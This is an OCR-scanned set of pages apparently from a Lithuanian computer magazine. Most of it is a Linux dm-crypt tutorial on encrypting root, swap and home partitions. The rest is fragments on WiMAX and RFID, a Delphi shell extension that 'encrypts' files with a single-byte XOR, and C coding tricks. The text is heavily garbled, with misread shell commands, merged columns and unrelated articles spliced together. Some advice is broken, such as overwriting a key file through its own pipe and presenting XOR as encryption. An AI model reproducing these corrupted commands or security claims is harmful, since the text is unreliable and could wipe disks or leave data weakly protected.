Kad konfigūracija būtų paprastesnė, visus punktus sukonfigū- 
ruosime ne kaip modulius, o kaip monolitą. Jeigu tu nuspręsi 
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Konsolė: cat /boot/grub/grub con 


kompiliuoti atskirus modulius, tuomet nepamiršk su modprobe 
iš anksto užkrauti atitinkamus modulius. Po perkrovi- 

mo reikia įdiegti user-space įrankius. Tam pasinaudok 
komanda: 


deblan/ apt-get install cryptsetup 
gentoo// emerge device-mapper cryptsetup 


Potojsitikink, kad device mapper paleistas: 


/dev/mapper/control 


Taip pat patikrink, ar atsirado crypt target 


+ /sbin/dmsetup targets 


crypt v1.1.0 

striped v1.0.2 ra 8£ 9 
linear v1.0.1 

error v1.0.1 

„Root“ particijos šifravimas 


Šakninės particijos šifravimą aš aptarsiu tik Gentoo sistemai, 
kadangi Debian'e viskas vyksta analogiškai. Norint šifruoti 
/root būtina, kad ji būtų sukurta kaip atskira particija. Linux 
neleidžia tiesiogiai krautis iš šifruotų particijų. Vietoje to reikia 
naudoti initrd (RAM diskas, kuris kraunasi prieš šakninės par- 
ticijos montavimą) 

Kad būtų galima korektiškai dirbti su udev, reikia įdiegti multi- 
path-tools: 


4 emerge multipath-tools 


Taip pat būtina sukurti ir primontuoti initrd. Tam sumontuokime 
/root particiją ir sukurkime tuščią initrd bylą: 


/mount /boot 
touch /boot/initrd 


Bylą /boot/initrd praplėsim iki 4 Mb dydžio ir užpildysim nuliais 


4ddil=/dev/zero of=/boot/initrd bs=1M count=4 


Darbui su byla sukuriame loopback įrenginį: 


*/sbin/losetup /dev/loopO /boot/initrd 


t I V o 9*2 ( 


Konsolė: dmsetup Is 


Konsolė: šilruotos particijos sukūrimas diske 
bylos pavidalu 


Jame sukuriame failų sistemą Ext2: 


4Isbin/mkežis /dev/initrd 
4 mkdir/mnt/initrd 


Loopback įrenginį montuojame ant disko katalogo: 


+ mount /dev/loopO /mnt/initrd 


Sukuriame katalogų medi ir skriptų bylas: 


Kcd/mnt/initrd 

4 mkdir etc dev lib bin proc new 
Atouch linuxrc devmap mknod.sh 
Achmod +xlinuxrc devmap mknod.sh 


Čia linuxrc — tiesiogiai už krovimąsi atsakingas skriptas, 0 devmap 
mknod.sh — reikiamus įrenginius sukuriantis skriptas. Kopijuojame 
reikiamas bylas: 


*.cp/bin/(sh,cat,mount,umount,mkdir,chroot,cryptsetup,sleep, mknod, 


sed.rm) /bin 


Sužinome kiekvienai bylai reikalingas bibliotekas ir kopijuojame jas 
įlilb katalogą: 


Add /bin/sh 
linux-gate.so.1 => (Oxffffe000) 
libdl.so.2 => /lib/libdl.so.2 (Oxb7f65000) 
libc.s0.6 => /lib/libc.s0.6 (0xb7e51000) 
Aib/ld-linux.s0.2 (Oxb7f73000) 
Kcp/libĄllbc.so.6,ld-linux.s0.2) /lib 


Sukuriame reikiamus įrenginius, be kurių nepavyks užkrauti siste- 
mos (jeigu tu naudoji kitą particiją su šaknine failų sistema, tuomet 
reikiamus mknod parametrus gali peržiūrėti su „Is I /dev/drive". 
Pavyzdžiui, /dev/hda3 atveju komanda atrodytų taip: „mknod /mnt/ 
initrd/dev/nda3 b3 3"): 


4 mknod /mnV/initrd/dev/console c 51 
Hmknod /mnt/initrd/dev/null c 13 

A mknod /mnt/initrd/dev/sda2 b 82 

+ mknod /mnt/initrd/dev/tty c50 


Patikriname visų į initrd patalpintų programų veikimą: 


4 chroot /mnt/initrd /bin/sh 
*/bin/chroot --help 
4 /bin/mkdir --help 


Išmontuojame initrd: 


Kcd- 
Aumount /mnt/initrd /boot 


Dabar paredaguojame fstab, kad ji atitiktų naują šakninę particiją. 
Šiame pavyzdyje opcija noatime nėra būtina, tačiau ji leidžia pa- 
spartinti disko operacijas, kadangi be jos neregistruojamas pasku- 
tinio kreipimosi į bylą laikas 


Avi/etc/Istab 
/dev/mapper/root /reiserts noatime 01 


Kitas žingsnis — grub konfigūravimas: 


Avi/boot/grub/grub.conf 

title=Gentoo Linux with initrd 

root (hd0,0) 

kernel /Armlinuz root=/dev/ramO rw init=Ainuxrc 
initrd /initrd 


Pasiruošimo procesas baigtas. Telieka užšifruoti šakninę failų sistemą. 
Tammums prireiks tuščios pakankamo dydžio particijos (pažymėkime 
jąkaip/dev/sdb1) Šakninę particiją pažymėkime kaip /dev/sda2 


Hmkdir/mnt/Ą/sda2,sdb1) 
/mount/dev/sda2 /mnt/sda2 
/mount/dev/sdb1 /mnt/sdb1 


Visą šakninės particijos turinį kopijuojame į švarią particiją. 
Acp-r-p-v/mnt/sda2/* /mnV/sdb1/ 
+ umount/dev/sda2 

Atliekame paruošiamuosius darbus, kad būtų galima krautis iš siste- 


mos kopijos (iš /dev/sdb1) — redaguojam bylą /mnt/sdb1/etc/tstab: 


vi /mnt/sdb1/etc/istab 
/dev/sdb1 /reiserts noatime 01 


G Redaguojame /baot/grub/grub.conf: 


Avi/boot/grub/grub.conf 
title=Gentoo Linux - Boot from copy 
root (hd0,0) 

kernel /Armlinuz root=/dev/sdb1 


£,Išmoniuojame įrenginį: 


Humount /dev/sdb! 


Užsikrovus iš sistemos kopijos sukuriame šifruotą šakninę particija: 


1 /bin/cryptsetup -y create root /dev/sda2 


Sistema pareikalaus įvesti šifravimo slaptažodį su patvirtinimu. Šio 
slaptažodžiobus prašoma OS užkrovimo metu. Pagalnutylėjimą nau- 
dojamas AES šifravimo algoritmas su 256 bitų raktu. Tai labai patiki- 
mas algoritmas, jį slaptų dokumentų šifravimui naudoja amerikiečių 
specialiosios tarnybos. Prieinamus šifravimo algoritmus galima per- 
žiūrėti su komanda „cat /proc/crypto". Su „-c' raktu galima nurodyti, 
kokį algoritmą naudoti, o su -h' — pasirinkti hešavimo algorilmą. 
Dabar sukurkime ReiserFS (arba bet kokią kitą) failų sistemą: 


4 mkreiserts /dev/mapper/root 


Kopijuojame šakninę sistemą į sukurtą šifruotą particiją: 


4 mount/dev/mapper/root /mnt/sda2 
Amount /dev/sdb1 /mnt/sdb1 
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£cop-r-p-v/mnt/sdb1/* /mnt/sda2, 
4 umount /dev/sdb1 /dev/sda2 


Viskas. Sistema paruošta užkrovimui iš šifruotos particijos 


„Swap“ šifravimas 
Debian atveju 
r Įsitikink, kad byloje /etc/defaults/cryptdisks yra tokia eilutė: 


Hwi/etc/defaults/cryptdisks 
CRYPTDISKS ENABLE=Yes 


Paredaguok bylą /etc/crypttab, kurioje nurodyk šifruoti swapą (čia 
Geo — Sswapo particijos pavadinimas): 


žvi/etc/crypttab 
cryptswap /dev/sda5 /dev/urandom swap ,cipher=aes,siz6=256,5wap 


Paredaguok /etc/istab, kad vietoje įprastinės swapo particijos būtų 
Eareiasama Device-mapper particija: 


Avi/etc/istab 


Idev/mapper/cryptswap none swap sw00 


Gentoo atveju veiksmų seka atrodo štai taip 
Į bylą /etc/conf.d/cryptts pridėk eilutę 


Kwi/etc/conf.d/cryptis 
swap=cryptswap source=/dev/sda5 


Paredaguok bylą /etc/fstab 


4vi/etc/tstab 


dev/mapper/cryptswap none swap sw0 


Taip mes gausime swap particiją cryptswap, kuri bus šifruojama at- 
sitiktiniu raktu. Vis dėlto iš pradžių būtų neblogai išvalyti seną swapą, 
Ly. į jį surašyti atsitiktinius duomenis, kadangi čia gali būti saugomi 
privačių duomenų fragmentai, palikti po įvairių programų darbo: 


4 swapoti 
4 ddif=/dev/urandomot=/dev/sda5 bs=1M 


Po to galima perkrauti sistemą ir pradėti naudoti naują šifruotą 
swapą. Jo krovimo metu slaptažodžio klausiama nebus. 
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„Home“ particijos šifravimas 
Toliau sukursime šifruotą home particiją 


H Užpildome particiją atsitiktiniais duomenimis. 


Addit=/dev/urandomot=/dev/sdb1 bs=1M 


Čia /dev/sdb1 — particija, kurioje bus saugomas šifruotas diskas, o 
michae|—loginio disko pavadinimas (/dev/mapper/michael). Dėme- 
sio: slaptažodis turi sutapti su vartotojo prisijungimo slaptažodžiu 
4cryptsetup -y create michael /dev/sdb1 

GrPalikrinam, artai veikia 
4 dmsetup Is 


michael (254, 1) 
cryptswap (254, 0) 


Sukuriame failų sistemą ext3 (savaime suprantama, kad vietoje 
ext3 gali būti bet kokia kita failų sistema) 


Hmkeefs -|/dev/mapper/michael 


NPemoniuojame particiją 


Hdmsetup remove michael 


Tuo atveju, jeigu tu naudosi ne particiją, o visą diską, visur vietoje 
/dev/sdb1 galima nurodyti /dev/sdb. 

Norint automatiškai montuoti particiją, reikia parsisiųsti (ftp.debian. 

org/clebian/pool/main/libp/libpam-mounvt/) ir įdiegti libpam-mount 


Adpkg-i!lbpam-mount 0.9.22-6 i386.deb 


Gentooatveju iš bugs.gentoo.org/attachment.cgi?id=64090 parsi- 
siųsk ebuild ir išpakuok jį į /usr/local/portage/sys-libs. Toliau į /etc/ 
make.conf pridedame tokią eilutę 


Avi/etc/make .conf 
PORTDIR OVERLAY=/usr/local/portage 


Sukompiliuojame pam mount (iš pradžių į /etc/portage/package 


keywords pridedame atitinkamą eilutę, kadangi jis pažymėtas 
kaip nestabilus): 
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„15 0U > I ORC1 AO RSA IU AA 


] c e + echo "sys-libs/pam mount -x86" >> /etc/portage/package.keywords 


4 emerge pam mount 


Debian sistemoje konfigūravimo procesas apsiriboja konfigūra- 
cinių bylų /etc/login.defs ir /etc/pam.dĄcommonauth,common= 
session,pam mount.confį paredagavimu: 


Avi/etc/pam d/common-auth 


auth optional pam mount.souse first pass 
Avi/etc/pam.d/common-session 
session optional pam mount.so 


AHviletc/security/pam mount.conf 
volume michael crypt - /dev/sdb1 /home/michael cipher=aes -- 


Hvi/etc/login.defs 
CLOSE SESSIONS yes 


Gentoo atveju situacija panaši: "g 
Konsolė: gvim /etc/fstab 

Į bylą/etc/pam.d/login pridedame tokias eilutes: 

Sukuriame 256 bitų raktą: 
Aviletc/pam.d/login 
auth optional | /lib/security/pam mount.so use first pass Acat/dev/urandom | head -c 32 > /home/michael key 
session optional  /lib/security/pam mount.so 

Sukuriame šifruotą home particiją: 

|/etc/security/pam mount.conf pridedame eilutę: 
Hddif=/dev/urandomof=/dev/sdb1 bs=1M 


Aviletc/security/pam mount.cont 4 cat/home/michael.key | cryptsetup create michael /dev/sdb1 
volume michael crypt- /dev/sdb1 /home/michael cipher=aes -- /mke2is-į/dev/mapper/michael 
A dmsetup remove michael 


Polo prisijungiame vardu michael. Diskas turėtų būti automatiškai 
primontuotas kaip /home/michael. Bėda tame, kad katalogo priėji-- Šifruojame raktą, kuriuo šifruotas diskas 
moteisės bus root:root. Jas reikia pakeisti į vartotojo teises: 
4 cat/home/michael.key | openssl aes-256-ecb > /home/michael.key 


4 chown michael:users /nome/michael aa | > 
Paprašius įvesti slaptažodį įvedame vartotojo slaptažodį. 


Be to, yra galimybė particiją šifruoti ne su vartotojo slaptažodžiu, o su Toliau vyksta konfigūravimo procesas — jis toks pat, kaip Ir šifruo- 
atskirai sugeneruotu raktu. Tokiu atveju galima lengvai pakeisti vartotojo jant be rakto, skiriasi tik viena eilutė: 
slaptažodį, nes nereikės iš naujo šifruoti viso disko. Tiesa, žinant vartotojo 
slaptažodį, raktą galima lengvai gauti. Dėl to šio šifravimo metodo nau- vi /etc/security/pam mount.cont 
dojimąaš laikau nepateisinamu. Visai kas kita, jeigu raktas yra išoriniame volume michael crypt-/dev/sdb1 /home/michael cipher=aes aes-256-ecb 
kaupiklyje, pavyzdžiui, USB atminties kortelėje. Tuometžinantslaptažodį,  /nome/michael key 
tačiau neturint atminties kortelės dešifruoti particijos bus neįmanoma. 
Įdiegiam openssl: Bylos pavidalo particija diske 
Iš pradžių reikia sukurti iš anksto apibrėžto dydžio bylą, tarkim, 50 Mb: 
debianž apt-get install openssl 
gentoo/ emerge openss| Atouch cryptdisk 
Ashred-n1 -s50M cryptdisk 


Pageidautina cryptdisk ištrinti būtent taip, kadangi tokiu atveju tu 
gausi atsitiktinių duomenų rinkinį, iš kurio nebus galima tiksliai su- 
žinoti, kiek realios informacijos saugoma šioje byloje. Atėjo laikas 
sukurti šifruotą particiją, panaudojant loopback įrenginį: 


/Hlosetup /dev/loopO -/cryptdisk 

4 cryptsetup -y create mydisk /dev/loopO 
Hmkreiseris /dev/mapper/mydisk 
Hmkdir/mnt/mydisk 

4 mount /dev/mapper/mydisk /mnt/mydisk 


Užšifruota particija dabar prieinama kaip /mnt/mydisk. Pabaigus 
darbą su privačiais duomenimis ją reikia išmontuoti, o po to paša- 
linti Ioopback įrenginį, kaip parodyta žemiau: 


4 umount/mnt/mydisk 
Acrypisetup remove mydisk 
4 losetup -d/dev/loopO 


Panorėjus galima parašyti nedidelį skriptą, kurisvisas šias koman- 
Konsolė: wiki, skirtas Dm-crypt das atlikinėtų automatiškai. 


58 vanuszrus 05 / 10( 41) 


Įsitaisyk patogiai. Atsipalaiduok. 
siaubingo skrydžio! 


L usa" 


-— 


„AINUOSIĖ NUO SPALIO 200. 


f 


+-- B" Vilsaine SĘ BB a> 


Sukūrimo data: 1997 


Ww. max 


LAIDŲ PALYDOS 


Technologija: „WiMAX“ 


Nedidelis veikimo spindulys ir normalaus roumin- 
go nebuvimas neleidžia Wi-Fi naudoti dideliais 
atstumais. Šių trūkumų neturi WiMAX technologija 
(standartas IEEE 802.16). Panašiai kaip mobilu- 
sis ryšys, WiMAX signalu padengiamos teritorijos 
spindulys siekia 50 kilometrų, ir, kas ypač svarbu 
ryšys veikia net ir be tiesioginio matomumo. Teo- 
riškai WiMAX pralaidumas siekia 70 Mbit/s, tačiau 
priklausomai nuo sąlygų realūs skaičiai svyruoja 
nuo 500 Kibt/s iki 2 Mbit/s. Pagal IEEE 802.16spe- 
cifikaciją, naudojamas 2-11 GHz dažnių diapa 
zonas, pripažįstamas Triple DES (128 bitų raktas) 
ir RSA (1024 bitų raktas) šifravimas, taip pal au 
tomatinis spinduliavimo galingumo valdymas. Kol 
kas WiMAX tinklų dar nedaug. Kur kas dažniau 
echnologija naudojama dideliu atstumu vienas 
ems Wi-Fi priėjimo taškams su 
ija išsilaikys artimiausius metus 


nuo kito nutolus 


jungti. Si tender 


Sukūrimo data: 1999 


Sukūrimo data: 2001 


ŠB Miniatiūrinės F 


Ba0A 


5 RFID mikroschemos 


Technologija: RFID 


ai, kuomet 
'tuojamos 
būtų galima nuolat 
kokia RFID 


mikr 


statom 
56 MHZ 
vų [ 


pecialūs 
dažnio ir 
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Praplėsk kontekstą 


„Windows“ kontekstinio meniu praplėtimas 


WINDOWS APLINKOS (SHELL) PRAPLĖTIMAS — 
GALINGAS ŠIOS SISTEMOS ELEMENTAS, LEIDŽIANTIS 
PROGRAMUOTOJUI SUKURTI PATOGIAS PROGRAMAS. 
TU NUOLAT SUSIDURI SU SKIRTINGOMIS JO 
APRAIŠKOMIS, T.Y. SU TOKIAIS NAUJAIS KONTEKSTINIO 
MENIU PUNKTAIS, KAIP ANTIVIRUSO SUKURTU „SCAN 
FOR VIRUSES...“, WINRAR SUKURTU „EXTRACT“, SU 
NAUJAIS UŽDUOČIŲ JUOSTOS ĮRANKIŲ SKYDELIAIS 


(TASKBAR TOOLBARS) IR T.T. 


Šiame straipsnyje aš parodysiu, kaip lengvai su Delphi galima sukurti savo praplėtimus, prie 


kontekstinio visų bylų meniu pridedant punktą „Užšifruoti“. 


COM objektai 

Kogero, pradėsime nuoto, kad betkoks Win- 
dows aplinkos praplėtimas įgyvendinamas 
su COM objektais. COM arba Component 
Object Modelyra ActiveX ir OLEtechnologi- 
jų pagrindas. COM apibrėžia API ir objektų 
susiejimo standartus, nepriklausančius nuo 
programavimo kalbos ar platformos. COM 
objektas turi vieną ar keletą sąsajų, kurios iš 
esmės yra su šiuo objektu susietos funkcijų 
lentelės. COM apibrėžia funkcijų objektų iš- 
dėstymo atmintyje standartus. Šie objektai 
įkurdinami virtualiose lentelėse. Kiekvienos 
virtualios lentelės aprašymas programa- 
vimo kalba yra sąsaja. Visos COM sąsajos 
neaiškiai išvestos iš sąsajos /Unknown, kuri 
System modulyje apibrėžta štai taip 


type 
IUnknown = interface 
[(00000000-0000-0000-C000-000000000046)'] 
function Auerylnterface (const ID: TGUID; out 
Obj): Integer; stdcall; 
function AddRef: Integer; stdcall; 
function Release: Integer; stdcall; 
end; 


Būna tokių aplinkos praplėtimų 


m Kontekstinių meniu apdorotojai sukuriami 
su dviem sąsajomis: /ContextMenu ir IShel- 
IExtInit, kurie leidžia į kontekstinį aplinkos 
failų objektų meniu įkelti naujų punktų. 

m Perkėlimo apdorotuvai sukuriami su .są- 
saja /CopyHook. Jie leidžia kontroliuoti ir 
atšaukti kopijavimą, perkėlimą, pašalinimą 
bei pervadinimą. 
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m Perkėlimo su dešiniu pelės klavišu apdoro- 
tuvai (kaip ir kontekstinių meniu apdorotuvai) 
sukuriami su dviem sąsajomis: /ContextMenu 
irIShellExt!nit, tačiau jie į kontekstinį meniu, ku- 
tis atsiranda perkeliant objektą į naują vietą su 
dešiniu pelės klavišu, prideda naują punktą 

m Savybių puslapių (tabs) sukuriami reali- 
2uojami su sąsajomis /She//PropSheetExt ir 
IShellExtInit. Jie leidžia į bylų savybių dialo- 
golangą įdėti naujus puslapius 

m Piktogramų apdorotuvai sukuriami su 
sąsajomis /Extract/con ir IPersistFile. Šis 
apdorotuvas leidžia bylų tipui priskirti skir- 
tingas piktogramas 

a Tikslo (target) apdorotuvai sukuriami su 
sąsajomis /DropTarget ir IPersistFile. Jie 
apibrėžia aplinkos veiksmus perkeliant vie- 
ną aplinkos objektą ant kito 


Šiandien mums prireiks tik kontekstinio meniu 
apdorotuvo. Norint į meniu pridėti savo punk- 
tą, reikia sukurti COM objektą, Jis bus įgyven- 
dintas dinamiškai prijungiamos bibliotekos 
pavidalu, kurios pagrindas bus dvi sąsajos: 
IShellExtinit ir IContextMenu. Visų pirma, po 
kontekstinio meniu iškvietimo turi būti iniciali- 
Zuotas apdorotuvas. Tai daroma su sąsaja /S- 
hellExtinit, kuri turi tik vieną metodą /nitialize. Iš 
karto po inicializavimo iškviečiamas TConte- 
xtMenu.OueryContextMenu (Menu:HMENU,; 
indexMenu, idCmdFirst, idCmdlLast, uFlags. 
UINT): hResult — jis į meniu prideda naują 
punktą. Šio metodo parametrai 


a Menu —sisteminio meniu deskriptorius. 
m/ndexMenu — meniu eilutės, į kurią reikia 
pridėti naują punktą, numeris. 


mlaCmdFirst, IdCmdLast — leistinų įterpia- 
mų meniu punktų identifikatorių reikšmių 
diapazonas 

muFlags — vėliavėlių rinkinys. 


Toliau iškviečiamas metodas TContextMenu. 
GetCommandString(idCmd, uType: UINT, 
pwReserved: PUINT; pszName: LPSTR; cch- 
Max: UINT): HRESULT. Šis metodas skirtas 
gauti konkrečią meniu komandą. Parametrai 


m i(dCmd — meniu punkto identifikatorius, 
kuris atitinka /dCmdFirst 

muType užklausia informacijos tipo: GCS 
VERB arba GCS. HELPTEXT. 
mpwReserved rezervuotas 

mpszName apibrėžia buferį-eilutę 
mcchMax apibrėžia buferio dydį 


Kai pasirenkamas (paspaudžiamas) mūsų 
punktas, tai iškviečiamas metodas Con- 
textMenu.InvokeCommand, kuriame mes 
aprašysime, kas turi vykti. Šio metodo para- 
metrasyratik TCMInvokeCommandlntotipo 
įrašas. Štai įrašo laukai 


m cbSize apibrėžia sizeof(TCMInvokeCom 
mandlnto)) struktūros dydį 
mhwndapibrėžia langą, kuris busvisų langų 
savininku 
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Open 
Print 


Na Scan for viruses 


Open Wh... 


Send To 


Cut 
Copy 


š 
Create Short! 
Delete 
Rename 


Properties 


m/Me 
dwHotkey/hicon 

2Verb apibrėžia iškviečiamą komandą 
a /oParameters — parametrai (neprivalomas) 
anShow—howWindow (SW *) perduoda- 
ma vėliavėlė 

m dwHolKey — karš 
juojamas su programa 
(neprivalomas) 

m hlcon apibrėžia ikona 


nurodyti parametrai 


k apibrėžia, ar 


asOCi- 


mą (neprivalomas) 


aptarėme visus dv S T 

dus, kurių reikia norint sukurti COM objek- 
tą, tačiau kad jis suveiktų, mes dar turime 
egistruoti. Tam eminiame registre 
kia sukurti šias reikš 
1.HKEY CLASSES ROOTCLSID 
XXXXXXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX). 
uoja mūsų COM server 

2. HKEY CLASSES ROOTN*shellexCon- 
textMenuHandlers ConiMenuCLSID, kur 
vietoje CLSID — mūsų numeris. Šis įrašai 
parodo bus iškvie- 


u kokiais 
apdorotuvas (šiuo atveju 
reiškia, kad apdorotuvas bus iškviečiamas 
su visomis bylomis) 

3, HKEY LOCAL MACHINESoftwareWMi- 
( x ros0ft WindowsCurrentVersionWShel IE- 
xlensionsVApproved — ši reikšmė |ei 
naudoti mūsų DLL ir užkrauna ją į operaty- 
vinę atmintį iš karto po pirmojo iškvietimo. 


bylų tipais 


Šifruojame 
Aš nepuoliau rašyti žvėriškai sudėtingų krip- 
toalgoriimų ir nusprendžiau, kad optimalu 
jūtų paprasčiausiai xor'inti šitruojamą bylą 
Tokiu atveju šifravimo procedūros algoritmas 
atrodo štai taip: Atidarome bylą, nuskaitome 
vieną baitą, jį xorinam ir įrašome į tą pačią 
etą. Finale mes gausime to paties ilgio bylą 
pačiu pavadinimu, tačiau jos turinys bus 
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Užšifruoti 


natai, naujasis meniu punktas 
ado 
Išeities tekstai 


Darbo prie Delphi projekto procesas 


kitas. Norint gauti pradinę bylą, mums reikia 
paprasčiausiai ją xor'inti dar kartą. Tiesa, 
kadangi mes visa tai darysime su visų tipų 
bylomis, skaitymui/rašymui reikia naudoti 
procedūras BlockRead ir BlockWrite. Dirbti 
su jomis ne sudėtingiau, nei su įprastinėmis 
įvedimo/išvedimo funkcijomis. Prašau 


Šifruojanti procedūra 

procedure Shifruok (FFileName: string) 
FFileName — šifruojamos bylos 

pavadinimas 


>] BWritten, TotalRead : Integer. 
Buf: Byte. 
begin 

AssignFile(FFFileName) 

Reset(F.1); / atidarome skaitymui/rašymui 
try 

TotalRead:=0; // nuskaitytų baitų kiekis 
repeat 


Iš F į Buf nuskaitome 1 baitą 
BlockRead(F,Buf, 1, BRead) 
if BRead > Othen 
begin 

rodyklė žiūri prieš paskutinį 
seek(FTotalRead); / nuskaitytą baitą 
Bul:=But xor 7; / xor'inam Ir įrašome baitą 
BlockWrite(F.Bul, BRead, BWritten) 
it BRead <> BWritten then 

raise Exception.Create( Klaida!) 
else begin 

TotalRead:= TotalRead + BRead 
end 
end 
until BRead=0 

tinally 
CloseFile(F) 
end 


Suvirškinam ką perskaitėm 

Mes jau išsiaiškinome viską, ko mums 
reikėjo, todėl dabar siūlyčiau iš Delphi 
medžiagos atsidaryti kontekstinio meniu 
praplėtimo pavyzdį (BorlandDelphiA 
DemosMctiveXShellExhcontmenu.dpr) 
ir jį paredaguoti. Iš pradžių nueikime į 


Unikalūs identifikatoriai 

GUID —tai tam tikras 128 bitų 
sveikas skaičius, kuris COM 
technologijoje naudojamas 
unikaliai identifikuoti sąsajoms 
GUID generuojamas su API 
funkcija CoCreateGUID(), o naujo 
GUID generavimo algoritmas 
veikia panaudodamas šios 
informacijos kombinaciją 
einamą datą ir laiką 
dažnį, tinklo plokštės adresą 
Jeigu kompiuteryje įdiegta 

tinklo plokštė, tuomet tokiame 
kompiuteryje sugeneruotas GUID 
bus iš tiesų unikalus, kadangi 
tinklo plokštės unikalumą 
garantuoja joje įmontuotas 
globalus identifikatorius 

(ID). Jeigu kompiuteryje nėra 
tinklo plokštės, tuomet jos 
numerį galima pakeisti kitu, jį 
sintezuojant panaudojus kitos 
kompiuteryje įdiegtos įrangos 
parametrus. 


soriaus 


Class ContextMenu ir pakeiskime TGUID 
reikšm, 1ę bet kokia kita 

Toliau einam į TContextMenu.O) 
tMenu ir punktą Insert Menu Compile 
keičiame į mūsų punkto pavadinim; 
Šifruoti“. Toliau eina GeiCompierFalh Šią 
funkciją pašaliname, oijosv er 
siškę Shifruok. Kaip žinia, TConte xiMe nu.In 
vokeCommand įvykdomas paspaudus pelę 
antmūsų meniu punkto, todel me 
tik Shifruok (FFileName), o 
). Na, o su TContextMenu.GetCommandS: 
tring taip pat viskas aišku, todėl jį p: 
be pasikeitimų. Bet TContextMenuFactory 
UpdateRegistry reikia pataisyti: tiesiog 
sisteminio registro kelius pakeičiame sav 
Štai ir viskas, daugiau nėra ką daryti... Dabar 
kompiliuojame ir gautą DLL įkeliame į, pavyz- 
džiui, CAWINDOWSsystem32 katalogą. O 
kas toliau? O toliau pasileidžiame cmd, jame 
surenkame Regsvr32 CAWINDOWSsys- 
tem32ContMenu.all — ir mūsų praplėtimas 
paruoštas darbui! Norint atšaukti registraciją 
pakanka įvykdyti Regsvr32/u CAWINDOWS 
system3AContMenu. dll. 


Atsidarome bet kurį katalogą, spustelime Dei 
kokią byląirmėgaujamės nauju meniu punktu 


Štai kaip nesudėtingai galima pridėti savo 
kontekstinio meniu punktą. Jeigu norėsi ša- 
lia jo pridėti ikonėlę (kaip pas archyvatorius) 
tam reikia panaudoti ne tik /ContextMenu 
betir/ContextMenu3 
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uacKNT A 


Su ženklu ar be 

Visiems žinoma, kad ((unsigned char) OxFF 
== (signed char) -1). Atitinkamai 32 bitų 
platformose ((unsigned int) OxFFFFFFFF 
(signed int) -1). Savaime suprantama, kad 
parašyti-1 yra kurkas patikimiau ir greičiau, 
nei išvardinti visas F 

Štai konkretus hakeriško kodo pavyzdys 


r(a=0,a<-1UL; a++) printf(«Soxn»,a) 

Normalaus“ taikomojo lygio programuotojo požiūriu, šis kodas iš 
viso neturėtų veikti, kadangi (0 > -1), todėl ciklas nebus nė karto 
įvykdytas. Tačiau tai ne paprastas -1, prie jo yra priesaga UL, kas 
tolygu konstrukcijai ((unsigned int) -1), kurią transtormavus gau- 
tume OxFFFFFFFF. 

Plėtoju mintį toliau: galima ne tik sutrumpinti išeities tekstą, bet ir 
optimizuoti mašininį kodą. Paimkime štai tokią konstrukciją („tei- 


singas" diapazono patikrinimo variantas) 


sig al X, Y. 
f ((x > 0) 88 (x < y)) 


Hakeriams akivaizdu, kad teigiamos x reikšmės tikrinimas čia yra 
perteklinis ir jo galima lengvai atsikratyti, kodą perrašant štai taip: 


"(( ed int) x < Y)) 


„ncxNY-Ž 


Nereikalingi argumentai 
C nereikalauja laikytis funkcijų prototipų, kas atveria 
plačias galimybes. Kadangi argumentai surašomi iš 
dešinės į kairę (t.y. steko viršūnėje atsiduria kairiau- 
sias argumentas), o steką išvalo pirminė funkcija, tai 
nereikalingi argumentai paprasčiausiai ignoruojami 
Štai čia prasideda įdomiausia dalis. Kadangi vietoje 
argumentų galima n oti išraiškas (o, kaip jau mi- 
nėjau, C kalboje išraiška gali būti praktiškai viskas 
kas tik nori), mes gauname galingą kovos su tigūri- 
niais skliausteliais įrankį Štai pavyzdžiui 


| (a) 
1 


x+=((a); 1! (n< MAX) n++ 


Visų pirma, atsikratome /f operatoriaus, pertvarkydami jį į tokią 
išraišką: ((n < MAX) £6 n++), ir perduodame jį funkcijai /() kaip 
„papildomą“ argumentą 


f(a)x += f(a, ((n< MAX) 88 n++)) 


Už tokius hakerizmus reikia mokėti listingo skaitomumo bei 

aiškumo sumažėjimu, jau nė nekalbant apie tai, kad „papildomi- 

nereikalingi" argumentai reikalauja papildomos vietos steke, be 

to, C kalboje neapibrėžta argumentų nustatymo tvarka, todėl 

be didelio poreikio šio triuko imtis neverta ir geriau pasinaudoti 
kablelio“ operatoriumi, aprašytu trečiam hake 
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Pamirštas kablelis Dviejų kinta- 
F kliaustelių gausybė smarkiai erzina, tod kyla natū 


isą konstrukciją parašyti vienoje eilutėje. Zvilgtelėki 
į „teisingo“ programuotojo parašytą kodo fragmentą: Klai 
liniam p 


printf(+96dn», x); n=0;a++ 


s kodas, tik parašytas hakerio. Kaip sakoma, sulygink 


stebuklingai" dingsta,okartusujaisdingstairtaškasiškabliataš) 
Nuolat atskirdami operatorius kabliata 
niršta paprasčiausiąkablelį, naudojamąišraiškoms < 
ali būti praktiškai v IT XOR panaudo- 
ai nuo argumentų 


Ikolistingo skai 


lisprogrami 


Ck 


uACK Funkcijos su klaustuku 
"A Pra ime nuo klasikos (žr. hack nr.1). Į klausimą: „Ką daro šis 
koda Jaugelis taikomųjų programuotojų įtikinamai atsako 
( Ne diliuoja“, Tačiau tiems, kurie vis dėlto nepatingi šio kodo 
tikrinti ir jį sukompiliuoti, nuo tokių galimybių šiek tiek pavažiuoja 
ir likusią dienos dalį jie praleidžia mąstydami, kaip tokie 
so gali veikti? 


o api 
am „tm 


arimo aišku, ką daro šis kodas pakanka vy 
prašymą, tačiau paaiškinti, kaip tai daroma, gali tik guru todu naudo! 
nkcijos pavadinimą, kompiliatorius grąžina rodyklę į ją. 
fHag reikšmės bus pasirinkta viena arba kita 

įkelta į skliaustelius ir laukia argumentų 

bandyk perrašyti šį haką 

nos bei 


ROGRAMAVIMO KALBA. 


SM Ų 
S ARKIAI VERTINĄ HAKERIAI TAČIAUJŲ N 


ke TOKIUS METODUS V A 
PRizę SUS DUS V; > EKENČIĄ K Ks A 
MA GERA KAKANTREIKI p —"—- 
Ą 4 
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amojoini- 


įėjimą į cikla) 


Į ciklą 
užima v stingui suteikia tam tikro 
tanettuomet, kai kie: 
šoma, kad C leidžia 


Kintamojo x iniciali įėjimą 
apsileidir 
kvienar 
cikle apibrėžt 
Xx nėra ciklo parai as? Juk k 
skai o hakeris ner 


į kintamųjų. Nair kas, kad 
viliatoriui 
tol, kol 


xdo ne 


Kai ki T L ip 


dar konk Kanon 


Ojeigu mes atsikratytumėm ciklo kūno ir vis- 
oda ikeltume į antrašte, šta 


rlabiau optimizuotas variantas 


„cxNIT 
l- P A- 


Funkcijų apibrėžimas rankiniu būdu 
istemoje reikia į ku 


Programuojant Window 
riama kodajijungti dideles inc >bylas, kurios 
žymiai sumažina transliavimo greitį, O tai er2i 


na. Tačiaureikiamas funkcijas galima apibrėžti 


